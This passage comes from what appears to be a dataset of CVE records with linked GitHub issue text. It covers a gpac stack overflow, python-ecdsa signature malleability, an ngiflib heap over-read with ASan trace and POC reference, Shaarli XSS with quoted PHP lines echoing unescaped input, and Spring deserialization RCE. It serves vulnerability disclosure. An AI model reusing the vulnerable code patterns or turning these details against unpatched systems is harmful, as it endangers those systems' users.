00 00 00 0x10006dc130e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006dc13110: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 0x10006dc13120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13130: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 0x10006dc13140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13160: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3045==ABORTING ```
There is a stack-buffer-overflow in the dimC_Read function of box_code_3gpp.c:1000
https://api.github.com/repos/gpac/gpac/issues/1348/comments
2
2019-11-13T07:25:13Z
2020-01-08T12:45:44Z
https://github.com/gpac/gpac/issues/1348
522,010,451
1,348
969
CVE-2019-14859
2020-01-02T15:15:11.960
A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "secalert@redhat.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14859" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/warner/python-ecdsa/issues/114" }, { "source": "secalert@redhat.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3" }, { "source": "secalert@redhat.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/ecdsa/0.13.3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14859" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/warner/python-ecdsa/issues/114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/ecdsa/0.13.3/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python-ecdsa_project:python-ecdsa:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7B0A174-35C3-4CBC-95FD-1359971CAE7E", "versionEndExcluding": "0.13.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ceph_storage:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D07DF15E-FE6B-4DAF-99BB-2147CF7D7EEA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ceph_storage:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "516F4E8E-ED2F-4282-9DAB-D8B378F61258", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openstack:10:*:*:*:*:*:*:*", "matchCriteriaId": "E722FEF7-58A6-47AD-B1D0-DB0B71B0C7AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:14:*:*:*:*:*:*:*", "matchCriteriaId": "EB7F358B-5E56-41AB-BB8A-23D3CB7A248B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:15:*:*:*:*:*:*:*", "matchCriteriaId": "70108B60-8817-40B4-8412-796A592E4E5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "6BBD7A51-0590-4DDF-8249-5AFA8D645CB6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/warner/python-ecdsa/issues/114
[ "Exploit", "Third Party Advisory" ]
github.com
[ "warner", "python-ecdsa" ]
When the DER signature is malformed, the `VerifyingKey.verify(sigdecode=sigdecode_der)` raises unexpected exceptions and in some cases does not raise any exception. `UnexpectedDER`, `IndexError` and `AssertionError` are raised in addition to `BadSignatureError`, at the same time flipping the 4th or 6th least significant bit of 2nd byte of a NIST521p signature does not cause it to be rejected (the DER encoding is strict, and every value has one defined encoding, any other encoding is invalid and needs to be rejected)
Inconsistent handling of malformed DER signatures
https://api.github.com/repos/tlsfuzzer/python-ecdsa/issues/114/comments
3
2019-09-25T19:03:04Z
2019-10-11T14:01:51Z
https://github.com/tlsfuzzer/python-ecdsa/issues/114
498,467,334
114
970
CVE-2019-20219
2020-01-02T15:15:12.520
ngiflib 0.4 has a heap-based buffer over-read in GifIndexToTrueColor in ngiflib.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/miniupnp/ngiflib/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/miniupnp/ngiflib/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniupnp_project:ngiflib:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "5BE2BAA9-5D76-4039-A655-3F478ED5D601", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/miniupnp/ngiflib/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "miniupnp", "ngiflib" ]
Tested in Ubuntu 19.04, 64bit, ngiflib(master 2bef2a0) Triggered by gif2tga $POC POC file: [poc.zip](https://github.com/miniupnp/ngiflib/files/3723825/poc.zip) asan ``` root@ubuntu:/home/tim/ngiflib-normal# ./gif2tga mr_gland.gif-out_of_bound-idx\:0xf3-0x0.gif ================================================================= ==94158==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000162 at pc 0x5632b5984c7a bp 0x7ffd20267aa0 sp 0x7ffd20267a90 READ of size 1 at 0x604000000162 thread T0 #0 0x5632b5984c79 in GifIndexToTrueColor /home/tim/ngiflib-normal/ngiflib.c:842 #1 0x5632b5984ec8 in WritePixels /home/tim/ngiflib-normal/ngiflib.c:226 #2 0x5632b5987664 in DecodeGifImg /home/tim/ngiflib-normal/ngiflib.c:582 #3 0x5632b5988fb7 in LoadGif /home/tim/ngiflib-normal/ngiflib.c:823 #4 0x5632b5983f29 in main /home/tim/ngiflib-normal/gif2tga.c:95 #5 0x7fc810b42b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #6 0x5632b59832d9 in _start (/home/tim/ngiflib-normal/gif2tga+0x22d9) Address 0x604000000162 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/ngiflib-normal/ngiflib.c:842 in GifIndexToTrueColor Shadow bytes around the buggy address: 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==94158==ABORTING ```
heap-buffer-overflow at WritePixels() in ngiflib.c:226
https://api.github.com/repos/miniupnp/ngiflib/issues/15/comments
2
2019-10-14T09:40:20Z
2020-01-05T08:51:16Z
https://github.com/miniupnp/ngiflib/issues/15
506,545,294
15
972
CVE-2013-7351
2020-01-02T20:15:15.130
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Shaarli allow remote attackers to inject arbitrary web script or HTML via the URL to the (1) showRSS, (2) showATOM, or (3) showDailyRSS function; a (4) file name to the importFile function; or (5) vectors related to bookmarks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@debian.org", "tags": [ "Exploit", "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://seclists.org/oss-sec/2014/q2/1" }, { "source": "security@debian.org", "tags": [ "Exploit", "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://seclists.org/oss-sec/2014/q2/4" }, { "source": "security@debian.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92215" }, { "source": "security@debian.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sebsauvage/Shaarli/commit/53da201749f8f362323ef278bf338f1d9f7a925a" }, { "source": "security@debian.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sebsauvage/Shaarli/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://seclists.org/oss-sec/2014/q2/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://seclists.org/oss-sec/2014/q2/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92215" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sebsauvage/Shaarli/commit/53da201749f8f362323ef278bf338f1d9f7a925a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sebsauvage/Shaarli/issues/134" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shaarli_project:shaarli:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D0345D4-5FA4-40FD-B35E-226B4EA356AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/sebsauvage/Shaarli/issues/134
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sebsauvage", "Shaarli" ]
Line 945: ``` echo '</channel></rss><!-- Cached version of ' . pageurl () . ' -->'; ``` Line 1030: ``` $feed .= '</feed><!-- Cached version of ' . pageurl () . ' -->'; echo $feed; ``` Line 1107: ``` echo '</channel></rss><!-- Cached version of ' . pageurl () . ' -->'; ``` Line 1614: ``` echo <<<HTML <!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <!-- Shaarli {$exportWhat} bookmarks export on {$currentdate} --> [...] ``` Line 1750: ``` echo '<script language="JavaScript">alert("File ' . $filename . ' (' . $filesize . ' bytes) was successfully processed: ' . $import_count . ' links imported.");document.location=\'?\';</script>'; ``` Line 1754 ```echo '<script language="JavaScript">alert("File ' . $filename . ' (' . $filesize . ' bytes) has an unknown file format. Nothing was imported.");document.location=\'?\';</script>'; ``` ```
Multiples XSS in index.php
https://api.github.com/repos/sebsauvage/Shaarli/issues/134/comments
3
2013-10-22T12:44:52Z
2014-04-01T20:16:21Z
https://github.com/sebsauvage/Shaarli/issues/134
21,379,195
134
973
CVE-2016-1000027
2020-01-02T23:15:11.857
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "0CCA2DB9-D481-4326-8B97-09197B2D6966", "versionEndExcluding": "6.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "spring-projects", "spring-framework" ]
**Affects:** \5.2.3.RELEASE Issue Title : Sonartype vulnerability CVE-2016-1000027 in Spring-web project Description Description from CVE Pivotal Spring Framework 4.1.4 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The org.springframework:spring-web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The readRemoteInvocation method in HttpInvokerServiceExporter.class does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability (CVE-2011-2894) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: https://www.tenable.com/security/research/tra-2016-20 Recommendation There is no non-vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the HttpInvokerServiceExporter class: "WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead." The developer's general advice also states: "Do not use Java serialization for external endpoints, in particular not for unauthorized ones. HTTP invoker is not a well-kept secret (or an "oversight") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivoltal will enhance their documentation for the 4.2.6 and 3.2.17 releases." Reference: https://www.tenable.com/security/research/tra-2016-20 Root Cause spring-web-5.2.3.RELEASE.jar <= org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.class : [2.5.1,) Advisories Third Party: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027 Third Party: https://www.tenable.com/security/research/tra-2016-20 CVSS Details CVE CVSS 3: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Sonatype vulnerability CVE-2016-1000027 in Spring-web project
https://api.github.com/repos/spring-projects/spring-framework/issues/24434/comments
85
2020-01-27T06:46:04Z
2025-03-12T16:51:10Z
https://github.com/spring-projects/spring-framework/issues/24434
555,385,999
24,434
974
CVE-2016-1000027
2020-01-02T23:15:11.857
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": 